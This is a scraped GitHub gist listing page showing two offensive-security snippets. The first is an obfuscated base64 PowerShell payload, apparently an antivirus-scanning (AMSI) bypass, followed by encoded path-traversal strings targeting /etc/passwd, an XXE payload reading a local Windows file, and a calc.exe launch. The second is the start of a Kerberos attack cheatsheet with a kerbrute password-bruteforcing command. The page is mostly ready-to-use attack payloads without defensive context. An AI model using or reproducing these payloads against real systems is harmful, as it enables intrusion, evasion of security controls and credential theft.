Skip to content

Instantly share code, notes, and snippets.

@0xmahmoudJo0
0xmahmoudJo0 / 2.ps1
Last active December 30, 2024 07:52
[SySteM.teXt.ENcoDiNG]::UnICode.geTsTRiNG([SYStem.ConVErT]::frOmbAsE64sTRING("IwBVAG4AawBuAG8AdwBuACAALQAgAEYAbwByAGMAZQAgAGUAcgByAG8AcgAgAAoAJAB0ADIAcwA9ACQAbgB1AGwAbAA7ACQAUQBMADYASABCADUAWgBTAFgAagBSAFgAZQA0AGkAdwBpAD0AWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAQQBsAGwAbwBjAEgARwBsAG8AYgBhAGwAKAAoADYANwA4ADEAKwAyADIAOQA1ACkAKQA7ACQAZQBhAHoAaABuAD0AIgArACgAJwB3APQA4QB5AHEAcQDpAGsAZgBkAGgAdwB5AOkA9AB3AGcAawBxAPUAcABxACcAKwAnAGcAdABnAOwAJwApAC4AbgBPAFIAbQBBAGwASQB6AEUAKABbAGMAaABBAHIAXQAoAFsAYgBZAFQAZQBdADAAeAA0ADYAKQArAFsAQwBoAGEAcgBdACgAMQAxADEAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADcAMgApACsAWwBDAGgAYQByAF0AKABbAGIAeQB0AEUAXQAwAHgANgBkACkAKwBbAEMASABBAFIAXQAoADYAOAAqADUAMgAvADUAMgApACkAIAAtAHIAZQBwAGwAYQBjAGUAIABbAEMAaABBAHIAXQAoAFsAQgB5AHQARQBdADAAeAA1AGMAKQArAFsAYwBIAGEAUgBdACgAOAAwACsAMwAyACkAKwBbAEMAaABhAHIAXQAoADEAMgAzACoANQA1AC8ANQA1ACkAKwBbAGMASABBAHIAXQAoAFsAYgB5AFQAZQBdADAAeAA0AGQAKQArAFsAYwBoAGEAcgBdACgAMQAxADAAKwA2ADIALQ
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd.../../
..../../../
....\..\
....\..\..\
.../../../
.../../../../
...\..\
...\..\..\
...\..\..\..\
Start-Process "calc.exe"
#include <stdio.h>
int main(void) {
printf ("Hello world!");
}
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
@0xmahmoudJo0
0xmahmoudJo0 / kerberos_attacks_cheatsheet.md
Created March 23, 2022 00:58 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: